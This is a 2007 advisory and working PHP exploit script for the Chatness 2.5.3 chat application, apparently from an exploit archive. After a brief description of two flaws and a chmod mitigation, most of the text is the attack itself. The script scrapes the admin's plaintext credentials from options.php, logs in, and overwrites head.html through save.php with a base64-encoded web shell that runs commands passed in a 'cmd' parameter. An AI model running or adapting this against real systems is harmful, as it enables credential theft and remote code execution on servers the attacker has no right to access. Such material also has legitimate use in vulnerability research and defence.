Chatness 2.5.3 (options.php/save.php) Remote Code Execution Exploit

                                                <?/*
Files:&nbsp;options.php,&nbsp;save.php
Affects:&nbsp;Chatness&nbsp;<=&nbsp;2.5.3
Date:&nbsp;12th&nbsp;April&nbsp;2007

Issue&nbsp;Description:
===========================================================================
Chatness&nbsp;suffers&nbsp;with&nbsp;two&nbsp;main&nbsp;vulnerabilities,&nbsp;the&nbsp;first&nbsp;of&nbsp;these&nbsp;in
/admin/options.php&nbsp;the&nbsp;problems&nbsp;occur&nbsp;because&nbsp;the&nbsp;script&nbsp;first&nbsp;fails&nbsp;to
verify&nbsp;if&nbsp;the&nbsp;user&nbsp;is&nbsp;in&nbsp;fact&nbsp;an&nbsp;administrator&nbsp;and&nbsp;secondly&nbsp;it&nbsp;prints&nbsp;the
administrators&nbsp;username&nbsp;and&nbsp;password&nbsp;in&nbsp;plain&nbsp;text&nbsp;as&nbsp;part&nbsp;of&nbsp;the&nbsp;pre-filled
form.

The&nbsp;second&nbsp;issue&nbsp;occurs&nbsp;in&nbsp;/admin/save.php&nbsp;and&nbsp;/index.php&nbsp;while&nbsp;save.php
limits&nbsp;writing&nbsp;to&nbsp;just&nbsp;.html&nbsp;extended&nbsp;filenames&nbsp;it&nbsp;is&nbsp;possible&nbsp;for&nbsp;an
attacker&nbsp;to&nbsp;overwrite&nbsp;either&nbsp;foot.html&nbsp;or&nbsp;head.html&nbsp;to&nbsp;contain&nbsp;arbitrary&nbsp;php
code&nbsp;which&nbsp;would&nbsp;then&nbsp;be&nbsp;executed&nbsp;when&nbsp;included&nbsp;by&nbsp;index.php
===========================================================================

Scope:
===========================================================================
Combined&nbsp;these&nbsp;two&nbsp;seperate&nbsp;issues&nbsp;will&nbsp;allow&nbsp;an&nbsp;attacker&nbsp;to&nbsp;gain&nbsp;access&nbsp;to
the&nbsp;system&nbsp;and&nbsp;execute&nbsp;code/commands&nbsp;of&nbsp;their&nbsp;choice.
===========================================================================

Recommendation:
===========================================================================
Until&nbsp;a&nbsp;patch&nbsp;is&nbsp;availible&nbsp;it&nbsp;would&nbsp;be&nbsp;advisable&nbsp;to&nbsp;chmod&nbsp;both&nbsp;foot.html
and&nbsp;head.html&nbsp;to&nbsp;a&nbsp;mode&nbsp;that&nbsp;makes&nbsp;them&nbsp;unwritable&nbsp;by&nbsp;the&nbsp;web&nbsp;server,&nbsp;this
will&nbsp;minimize&nbsp;the&nbsp;risk&nbsp;of&nbsp;arbitrary&nbsp;code&nbsp;execution.
===========================================================================

Discovered&nbsp;By:&nbsp;Gammarays
*/?>


<?php

echo&nbsp;\"########################################################
\";
echo&nbsp;\"#&nbsp;&nbsp;&nbsp;Special&nbsp;Greetings&nbsp;To&nbsp;-&nbsp;Timq,Warpboy,The-Maggot&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#
\";
echo&nbsp;\"########################################################


\";

$payload&nbsp;=&nbsp;\"JTNDJTNGcGhwK2lmJTI4aXNzZXQlMjglMjRfR0VUJTVCJTI3Y21kJTI3JTVEJTI5JTI5JTdCZWNobytzaGVsbF9leGVjJTI4dXJsZGVjb2RlJTI4JTI0X0dFVCU1QiUyN2NtZCUyNyU1RCUyOSUyOSUzQmRpZSUyOCUyOSUzQiU3RCUzRiUzRQ==\";
$payload&nbsp;=&nbsp;base64_decode($payload);


if($argc!=2)&nbsp;die(\"Usage:&nbsp;<url>&nbsp;
	Ex:&nbsp;http://www.example.com/chatness/
\");

$url&nbsp;=&nbsp;$argv[1];

$ch&nbsp;=&nbsp;curl_init($url&nbsp;.&nbsp;\"admin/options.php\");
if(!$ch)&nbsp;die(\"Error&nbsp;Initializing&nbsp;CURL\");

echo&nbsp;\"[&nbsp;]&nbsp;Attempting&nbsp;To&nbsp;Fetch&nbsp;Admin&nbsp;Login...
\";
curl_setopt($ch,&nbsp;CURLOPT_RETURNTRANSFER,&nbsp;1);
$res&nbsp;=&nbsp;curl_exec($ch);
if(!$res)&nbsp;die(\"Error&nbsp;Connecting&nbsp;To&nbsp;Target\");

$httpresult&nbsp;=&nbsp;curl_getinfo($ch,CURLINFO_HTTP_CODE);
if($httpresult!=200)&nbsp;die(\"Error&nbsp;-&nbsp;URL&nbsp;Appears&nbsp;To&nbsp;Be&nbsp;Incorrect\");

//Not&nbsp;good&nbsp;-&nbsp;but&nbsp;it&nbsp;works...sometimes
$junkarray&nbsp;=&nbsp;explode(\"id=\",$res);
$junkarray&nbsp;=&nbsp;explode(\"\"\",$junkarray[14]);
$username&nbsp;=&nbsp;$junkarray[3];

$junkarray&nbsp;=&nbsp;explode(\"id=\",$res);
$junkarray&nbsp;=&nbsp;explode(\"\"\",$junkarray[15]);
$password&nbsp;=&nbsp;$junkarray[3];

echo&nbsp;\"[&nbsp;]&nbsp;Found&nbsp;Username&nbsp;And&nbsp;Password&nbsp;-&nbsp;\".$username.\"&nbsp;/&nbsp;\".$password.\"
\";
echo&nbsp;\"[&nbsp;]&nbsp;Logging&nbsp;In...
\";

//Login
curl_setopt($ch,&nbsp;CURLOPT_URL,$url&nbsp;.&nbsp;\"admin/login.php\");
curl_setopt($ch,&nbsp;CURLOPT_COOKIEJAR,&nbsp;\"mrcookie.dat\");
curl_setopt($ch,&nbsp;CURLOPT_POST,1);
curl_setopt($ch,
CURLOPT_POSTFIELDS,\"user=\".$username.\"&pass=\".$password.\"&submit=Login\");
$res&nbsp;=&nbsp;curl_exec($ch);
if(!res)&nbsp;die(\"Error&nbsp;Connecting&nbsp;To&nbsp;Target\");

$httpresult&nbsp;=&nbsp;curl_getinfo($ch,CURLINFO_HTTP_CODE);
if($httpresult==200)&nbsp;die(\"Error&nbsp;Invalid&nbsp;Username/Password\");

echo&nbsp;\"[&nbsp;]&nbsp;Login&nbsp;Succeeded..
\";

//Deploy&nbsp;Main&nbsp;Payload
curl_setopt($ch,&nbsp;CURLOPT_URL,$url&nbsp;.&nbsp;\"admin/save.php?file=head\");
curl_setopt($ch,&nbsp;CURLOPT_COOKIEFILE,&nbsp;\"mrcookie.dat\");
curl_setopt($ch,&nbsp;CURLOPT_POSTFIELDS,\"html=\".$payload);
$res&nbsp;=&nbsp;curl_exec($ch);
if(!res)&nbsp;die(\"Error&nbsp;Connecting&nbsp;To&nbsp;Target\");

echo&nbsp;\"[&nbsp;]&nbsp;Payload&nbsp;Deployed
\";
echo&nbsp;\"[&nbsp;]&nbsp;Shell&nbsp;Accessible&nbsp;at&nbsp;\".$url.\"index.php?cmd=<yourcommand>\";
curl_close($ch);
?>

&nbsp;